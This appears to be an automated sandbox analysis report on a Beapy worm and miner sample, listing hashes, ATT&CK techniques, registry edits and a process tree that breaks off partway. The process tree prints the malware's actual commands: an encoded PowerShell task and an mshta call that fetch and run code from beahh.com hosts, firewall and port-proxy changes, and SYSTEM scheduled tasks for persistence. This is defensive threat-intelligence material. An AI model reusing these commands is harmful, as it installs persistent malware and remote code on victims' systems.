beapy | 2ad506baf005089e45769c6a7f6a37319d47834bad6375e3e3107cd263142436

Analysis

max time kernel
151s
max time network
151s
platform
windows7_x64
resource
win7v20201028
submitted
05-04-2021 09:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2ad506baf005089e45769c6a7f6a37319d47834bad6375e3e3107cd263142436.exe
Size

7.8MB
MD5

21ff567a59d78b24c3fcaaba01b6a157
SHA1

8dd675c4a6970d227579b5c1ccc748fd1b03de4c
SHA256

2ad506baf005089e45769c6a7f6a37319d47834bad6375e3e3107cd263142436
SHA512

bf8e7efa3b048352f2b9c1551e5a7875735af8f5596322d93b886bd359ae8b40f38844095ea58b9b0afd086e0f47f111c928f738309eea9d15e8f1ae58333ca4

Score

10^/10

beapy evasion miner pyinstaller worm

Malware Config

Signatures

Beapy
Beapy is a python worm with crypto mining capabilities.
miner worm beapy
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Executes dropped EXE 3 IoCs

pid	Process
3032	caHBLfKm.exe
2980	sUBhFuFA.exe
1984	sUBhFuFA.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

Loads dropped DLL 22 IoCs

pid	Process
1032	2ad506baf005089e45769c6a7f6a37319d47834bad6375e3e3107cd263142436.exe
1032	2ad506baf005089e45769c6a7f6a37319d47834bad6375e3e3107cd263142436.exe
1032	2ad506baf005089e45769c6a7f6a37319d47834bad6375e3e3107cd263142436.exe
1032	2ad506baf005089e45769c6a7f6a37319d47834bad6375e3e3107cd263142436.exe
1032	2ad506baf005089e45769c6a7f6a37319d47834bad6375e3e3107cd263142436.exe
1032	2ad506baf005089e45769c6a7f6a37319d47834bad6375e3e3107cd263142436.exe
1032	2ad506baf005089e45769c6a7f6a37319d47834bad6375e3e3107cd263142436.exe
1032	2ad506baf005089e45769c6a7f6a37319d47834bad6375e3e3107cd263142436.exe
1032	2ad506baf005089e45769c6a7f6a37319d47834bad6375e3e3107cd263142436.exe
1032	2ad506baf005089e45769c6a7f6a37319d47834bad6375e3e3107cd263142436.exe
1032	2ad506baf005089e45769c6a7f6a37319d47834bad6375e3e3107cd263142436.exe
1032	2ad506baf005089e45769c6a7f6a37319d47834bad6375e3e3107cd263142436.exe
1032	2ad506baf005089e45769c6a7f6a37319d47834bad6375e3e3107cd263142436.exe
1032	2ad506baf005089e45769c6a7f6a37319d47834bad6375e3e3107cd263142436.exe
1032	2ad506baf005089e45769c6a7f6a37319d47834bad6375e3e3107cd263142436.exe
1032	2ad506baf005089e45769c6a7f6a37319d47834bad6375e3e3107cd263142436.exe
1032	2ad506baf005089e45769c6a7f6a37319d47834bad6375e3e3107cd263142436.exe
1032	2ad506baf005089e45769c6a7f6a37319d47834bad6375e3e3107cd263142436.exe
1032	2ad506baf005089e45769c6a7f6a37319d47834bad6375e3e3107cd263142436.exe
1032	2ad506baf005089e45769c6a7f6a37319d47834bad6375e3e3107cd263142436.exe
1984	sUBhFuFA.exe
1984	sUBhFuFA.exe

Drops file in Windows directory 5 IoCs

description	ioc	Process
File created	\??\c:\windows\caHBLfKm.exe	cmd.exe
File opened for modification	\??\c:\windows\caHBLfKm.exe	cmd.exe
File created	\??\c:\windows\sUBhFuFA.exe	cmd.exe
File opened for modification	\??\c:\windows\sUBhFuFA.exe	cmd.exe
File opened for modification	\??\c:\windows\sUBhFuFA.exe	cmd.exe

Detects Pyinstaller 8 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x0003000000013131-88.dat	pyinstaller
behavioral1/files/0x0003000000013131-102.dat	pyinstaller
behavioral1/files/0x0005000000013136-107.dat	pyinstaller
behavioral1/files/0x0005000000013136-111.dat	pyinstaller
behavioral1/files/0x0003000000013141-113.dat	pyinstaller
behavioral1/files/0x0003000000013141-115.dat	pyinstaller
behavioral1/files/0x0005000000013136-116.dat	pyinstaller
behavioral1/files/0x0005000000013136-118.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 9 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
2348	schtasks.exe
2732	schtasks.exe
1556	schtasks.exe
680	schtasks.exe
2376	schtasks.exe
2340	schtasks.exe
2580	schtasks.exe
2640	schtasks.exe
2584	schtasks.exe

Gathers network information 2 TTPs 3 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command-Line Interface

T1059

pid	Process
1368	ipconfig.exe
920	ipconfig.exe
1416	netstat.exe

Modifies data under HKEY_USERS 53 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	cmd.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	WScript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WScript.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-102 = "1.0"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-4 = "1.0"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-102 = "1.0"	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WScript.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-103 = "1.0"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-102 = "Microsoft Corporation"	netsh.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	cmd.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft	WScript.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-3 = "Microsoft Corporation"	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	WScript.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	WScript.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	WScript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached	WScript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	cmd.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-101 = "Provides DHCP based enforcement for NAP"	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WScript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings	WScript.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings	WScript.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-100 = "DHCP Quarantine Enforcement Client"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-101 = "Provides RD Gateway enforcement for NAP"	netsh.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	WScript.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	WScript.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-1 = "IPsec Relying Party"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-100 = "EAP Quarantine Enforcement Client"	netsh.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{B155BDF8-02F0-451E-9A26-AE317CFD7779} {ADD8BA80-002B-11D0-8F0F-00C04FD7D062} 0xFFFF = 010000000000000030dc0576fd29d701	WScript.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-103 = "Microsoft Corporation"	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings	WScript.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{35786D3C-B075-49B9-88DD-029876E11C01} {ADD8BA80-002B-11D0-8F0F-00C04FD7D062} 0xFFFF = 010000000000000010b8fe75fd29d701	WScript.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	WScript.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings	WScript.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	WScript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	cmd.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host	WScript.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-100 = "RD Gateway Quarantine Enforcement Client"	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	WScript.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	cmd.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	WScript.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-101 = "Provides Network Access Protection enforcement for EAP authenticated network connections, such as those used with 802.1X and VPN technologies."	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-103 = "Microsoft Corporation"	netsh.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	cmd.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	cmd.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-2 = "Provides IPsec based enforcement for Network Access Protection"	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	cmd.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	cmd.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
2012	powershell.exe
2012	powershell.exe
2012	powershell.exe
2012	powershell.exe
2012	powershell.exe
2012	powershell.exe
2012	powershell.exe
1032	2ad506baf005089e45769c6a7f6a37319d47834bad6375e3e3107cd263142436.exe

Suspicious use of AdjustPrivilegeToken 42 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	920	WMIC.exe
Token: SeSecurityPrivilege	920	WMIC.exe
Token: SeTakeOwnershipPrivilege	920	WMIC.exe
Token: SeLoadDriverPrivilege	920	WMIC.exe
Token: SeSystemProfilePrivilege	920	WMIC.exe
Token: SeSystemtimePrivilege	920	WMIC.exe
Token: SeProfSingleProcessPrivilege	920	WMIC.exe
Token: SeIncBasePriorityPrivilege	920	WMIC.exe
Token: SeCreatePagefilePrivilege	920	WMIC.exe
Token: SeBackupPrivilege	920	WMIC.exe
Token: SeRestorePrivilege	920	WMIC.exe
Token: SeShutdownPrivilege	920	WMIC.exe
Token: SeDebugPrivilege	920	WMIC.exe
Token: SeSystemEnvironmentPrivilege	920	WMIC.exe
Token: SeRemoteShutdownPrivilege	920	WMIC.exe
Token: SeUndockPrivilege	920	WMIC.exe
Token: SeManageVolumePrivilege	920	WMIC.exe
Token: 33	920	WMIC.exe
Token: 34	920	WMIC.exe
Token: 35	920	WMIC.exe
Token: SeIncreaseQuotaPrivilege	920	WMIC.exe
Token: SeSecurityPrivilege	920	WMIC.exe
Token: SeTakeOwnershipPrivilege	920	WMIC.exe
Token: SeLoadDriverPrivilege	920	WMIC.exe
Token: SeSystemProfilePrivilege	920	WMIC.exe
Token: SeSystemtimePrivilege	920	WMIC.exe
Token: SeProfSingleProcessPrivilege	920	WMIC.exe
Token: SeIncBasePriorityPrivilege	920	WMIC.exe
Token: SeCreatePagefilePrivilege	920	WMIC.exe
Token: SeBackupPrivilege	920	WMIC.exe
Token: SeRestorePrivilege	920	WMIC.exe
Token: SeShutdownPrivilege	920	WMIC.exe
Token: SeDebugPrivilege	920	WMIC.exe
Token: SeSystemEnvironmentPrivilege	920	WMIC.exe
Token: SeRemoteShutdownPrivilege	920	WMIC.exe
Token: SeUndockPrivilege	920	WMIC.exe
Token: SeManageVolumePrivilege	920	WMIC.exe
Token: 33	920	WMIC.exe
Token: 34	920	WMIC.exe
Token: 35	920	WMIC.exe
Token: SeDebugPrivilege	2012	powershell.exe
Token: SeDebugPrivilege	1416	netstat.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1108 wrote to memory of 1032	1108	2ad506baf005089e45769c6a7f6a37319d47834bad6375e3e3107cd263142436.exe	27
PID 1108 wrote to memory of 1032	1108	2ad506baf005089e45769c6a7f6a37319d47834bad6375e3e3107cd263142436.exe	27
PID 1108 wrote to memory of 1032	1108	2ad506baf005089e45769c6a7f6a37319d47834bad6375e3e3107cd263142436.exe	27
PID 1108 wrote to memory of 1032	1108	2ad506baf005089e45769c6a7f6a37319d47834bad6375e3e3107cd263142436.exe	27
PID 1032 wrote to memory of 816	1032	2ad506baf005089e45769c6a7f6a37319d47834bad6375e3e3107cd263142436.exe	31
PID 1032 wrote to memory of 816	1032	2ad506baf005089e45769c6a7f6a37319d47834bad6375e3e3107cd263142436.exe	31
PID 1032 wrote to memory of 816	1032	2ad506baf005089e45769c6a7f6a37319d47834bad6375e3e3107cd263142436.exe	31
PID 1032 wrote to memory of 816	1032	2ad506baf005089e45769c6a7f6a37319d47834bad6375e3e3107cd263142436.exe	31
PID 816 wrote to memory of 920	816	cmd.exe	32
PID 816 wrote to memory of 920	816	cmd.exe	32
PID 816 wrote to memory of 920	816	cmd.exe	32
PID 816 wrote to memory of 920	816	cmd.exe	32
PID 1032 wrote to memory of 528	1032	2ad506baf005089e45769c6a7f6a37319d47834bad6375e3e3107cd263142436.exe	34
PID 1032 wrote to memory of 528	1032	2ad506baf005089e45769c6a7f6a37319d47834bad6375e3e3107cd263142436.exe	34
PID 1032 wrote to memory of 528	1032	2ad506baf005089e45769c6a7f6a37319d47834bad6375e3e3107cd263142436.exe	34
PID 1032 wrote to memory of 528	1032	2ad506baf005089e45769c6a7f6a37319d47834bad6375e3e3107cd263142436.exe	34
PID 528 wrote to memory of 1476	528	cmd.exe	35
PID 528 wrote to memory of 1476	528	cmd.exe	35
PID 528 wrote to memory of 1476	528	cmd.exe	35
PID 528 wrote to memory of 1476	528	cmd.exe	35
PID 1476 wrote to memory of 1412	1476	net.exe	36
PID 1476 wrote to memory of 1412	1476	net.exe	36
PID 1476 wrote to memory of 1412	1476	net.exe	36
PID 1476 wrote to memory of 1412	1476	net.exe	36
PID 1032 wrote to memory of 584	1032	2ad506baf005089e45769c6a7f6a37319d47834bad6375e3e3107cd263142436.exe	37
PID 1032 wrote to memory of 584	1032	2ad506baf005089e45769c6a7f6a37319d47834bad6375e3e3107cd263142436.exe	37
PID 1032 wrote to memory of 584	1032	2ad506baf005089e45769c6a7f6a37319d47834bad6375e3e3107cd263142436.exe	37
PID 1032 wrote to memory of 584	1032	2ad506baf005089e45769c6a7f6a37319d47834bad6375e3e3107cd263142436.exe	37
PID 584 wrote to memory of 1304	584	cmd.exe	38
PID 584 wrote to memory of 1304	584	cmd.exe	38
PID 584 wrote to memory of 1304	584	cmd.exe	38
PID 584 wrote to memory of 1304	584	cmd.exe	38
PID 1304 wrote to memory of 632	1304	net.exe	39
PID 1304 wrote to memory of 632	1304	net.exe	39
PID 1304 wrote to memory of 632	1304	net.exe	39
PID 1304 wrote to memory of 632	1304	net.exe	39
PID 1032 wrote to memory of 2012	1032	2ad506baf005089e45769c6a7f6a37319d47834bad6375e3e3107cd263142436.exe	40
PID 1032 wrote to memory of 2012	1032	2ad506baf005089e45769c6a7f6a37319d47834bad6375e3e3107cd263142436.exe	40
PID 1032 wrote to memory of 2012	1032	2ad506baf005089e45769c6a7f6a37319d47834bad6375e3e3107cd263142436.exe	40
PID 1032 wrote to memory of 2012	1032	2ad506baf005089e45769c6a7f6a37319d47834bad6375e3e3107cd263142436.exe	40
PID 1032 wrote to memory of 1232	1032	2ad506baf005089e45769c6a7f6a37319d47834bad6375e3e3107cd263142436.exe	41
PID 1032 wrote to memory of 1232	1032	2ad506baf005089e45769c6a7f6a37319d47834bad6375e3e3107cd263142436.exe	41
PID 1032 wrote to memory of 1232	1032	2ad506baf005089e45769c6a7f6a37319d47834bad6375e3e3107cd263142436.exe	41
PID 1032 wrote to memory of 1232	1032	2ad506baf005089e45769c6a7f6a37319d47834bad6375e3e3107cd263142436.exe	41
PID 1232 wrote to memory of 1368	1232	cmd.exe	42
PID 1232 wrote to memory of 1368	1232	cmd.exe	42
PID 1232 wrote to memory of 1368	1232	cmd.exe	42
PID 1232 wrote to memory of 1368	1232	cmd.exe	42
PID 1032 wrote to memory of 920	1032	2ad506baf005089e45769c6a7f6a37319d47834bad6375e3e3107cd263142436.exe	43
PID 1032 wrote to memory of 920	1032	2ad506baf005089e45769c6a7f6a37319d47834bad6375e3e3107cd263142436.exe	43
PID 1032 wrote to memory of 920	1032	2ad506baf005089e45769c6a7f6a37319d47834bad6375e3e3107cd263142436.exe	43
PID 1032 wrote to memory of 920	1032	2ad506baf005089e45769c6a7f6a37319d47834bad6375e3e3107cd263142436.exe	43
PID 1032 wrote to memory of 1416	1032	2ad506baf005089e45769c6a7f6a37319d47834bad6375e3e3107cd263142436.exe	44
PID 1032 wrote to memory of 1416	1032	2ad506baf005089e45769c6a7f6a37319d47834bad6375e3e3107cd263142436.exe	44
PID 1032 wrote to memory of 1416	1032	2ad506baf005089e45769c6a7f6a37319d47834bad6375e3e3107cd263142436.exe	44
PID 1032 wrote to memory of 1416	1032	2ad506baf005089e45769c6a7f6a37319d47834bad6375e3e3107cd263142436.exe	44
PID 2084 wrote to memory of 952	2084	inZXJGwq.exe	46
PID 2084 wrote to memory of 952	2084	inZXJGwq.exe	46
PID 2084 wrote to memory of 952	2084	inZXJGwq.exe	46
PID 2084 wrote to memory of 952	2084	inZXJGwq.exe	46
PID 952 wrote to memory of 2312	952	cmd.exe	48
PID 952 wrote to memory of 2312	952	cmd.exe	48
PID 952 wrote to memory of 2312	952	cmd.exe	48
PID 952 wrote to memory of 2312	952	cmd.exe	48

C:\Users\Admin\AppData\Local\Temp\2ad506baf005089e45769c6a7f6a37319d47834bad6375e3e3107cd263142436.exe
"C:\Users\Admin\AppData\Local\Temp\2ad506baf005089e45769c6a7f6a37319d47834bad6375e3e3107cd263142436.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1108
- C:\Users\Admin\AppData\Local\Temp\2ad506baf005089e45769c6a7f6a37319d47834bad6375e3e3107cd263142436.exe
  "C:\Users\Admin\AppData\Local\Temp\2ad506baf005089e45769c6a7f6a37319d47834bad6375e3e3107cd263142436.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:1032
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c wmic ntdomain get domainname
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:816
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic ntdomain get domainname
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:920
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c net localgroup administrators
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:528
  - - C:\Windows\SysWOW64\net.exe
      net localgroup administrators
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1476
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup administrators
        5⤵
        
        PID:1412
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c net group "domain admins" /domain
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:584
  - - C:\Windows\SysWOW64\net.exe
      net group "domain admins" /domain
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1304
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 group "domain admins" /domain
        5⤵
        
        PID:632
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\SysNative\WindowsPowerShell\v1.0\powershell.exe -exec bypass "import-module C:\Users\Admin\AppData\Local\Temp\m2.ps1"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2012
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ipconfig /all
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1232
  - - C:\Windows\SysWOW64\ipconfig.exe
      ipconfig /all
      4⤵
      Gathers network information
      PID:1368
- - C:\Windows\SysWOW64\ipconfig.exe
    ipconfig /all
    3⤵
    - Gathers network information
    PID:920
- - C:\Windows\SysWOW64\netstat.exe
    netstat -na
    3⤵
    - Gathers network information
    - Suspicious use of AdjustPrivilegeToken
    PID:1416

C:\Windows\inZXJGwq.exe
C:\Windows\inZXJGwq.exe
1⤵
- Suspicious use of WriteProcessMemory
PID:2084
- C:\Windows\SysWOW64\cmd.exe
  cmd /c call "c:\windows\temp\tmp.vbs"
  2⤵
  - Modifies data under HKEY_USERS
  - Suspicious use of WriteProcessMemory
  PID:952
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\windows\temp\tmp.vbs"
    3⤵
    - Modifies data under HKEY_USERS
    PID:2312
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c echo GvMefkV >> c:\windows\temp\svchost.exe&echo "*" >c:\windows\temp\ipc.txt&netsh firewall add portopening tcp 65533 DNSd&netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53&copy /y c:\windows\temp\svchost.exe c:\windows\caHBLfKm.exe&move /y c:\windows\temp\dig.exe c:\windows\EMmor.exe&if exist C:/windows/system32/WindowsPowerShell/ (schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn caHBLfKm /tr "C:\Windows\caHBLfKm.exe" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\PhtBWGx" /tr "c:\windows\EMmor.exe" /F) else (start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autocheck /f&schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autocheck /tr "cmd.exe /c mshta http://w.beahh.com/page.html?pEIDQHRRL"&schtasks /run /TN Autocheck&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autostart /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN Autostart /tr "c:\windows\EMmor.exe"&schtasks /run /TN Autostart&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN escan /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN escan /tr "c:\windows\caHBLfKm.exe"&schtasks /run /TN escan)
      4⤵
      Drops file in Windows directory
      PID:2268
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add portopening tcp 65533 DNSd
        5⤵
        Modifies data under HKEY_USERS
        
        PID:2364
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53
        5⤵
        Modifies data under HKEY_USERS
        
        PID:1800
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F
        5⤵
        Creates scheduled task(s)
        
        PID:2348
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn caHBLfKm /tr "C:\Windows\caHBLfKm.exe" /F
        5⤵
        Creates scheduled task(s)
        
        PID:2376
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\PhtBWGx" /tr "c:\windows\EMmor.exe" /F
        5⤵
        Creates scheduled task(s)
        
        PID:2340

C:\Windows\rVKyyjxF.exe
C:\Windows\rVKyyjxF.exe
1⤵
PID:2316
- C:\Windows\SysWOW64\cmd.exe
  cmd /c call "c:\windows\temp\tmp.vbs"
  2⤵
  - Modifies data under HKEY_USERS
  PID:2368
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\windows\temp\tmp.vbs"
    3⤵
    - Modifies data under HKEY_USERS
    PID:2404
  - - C:\Windows\SysWOW64\cmd.exe
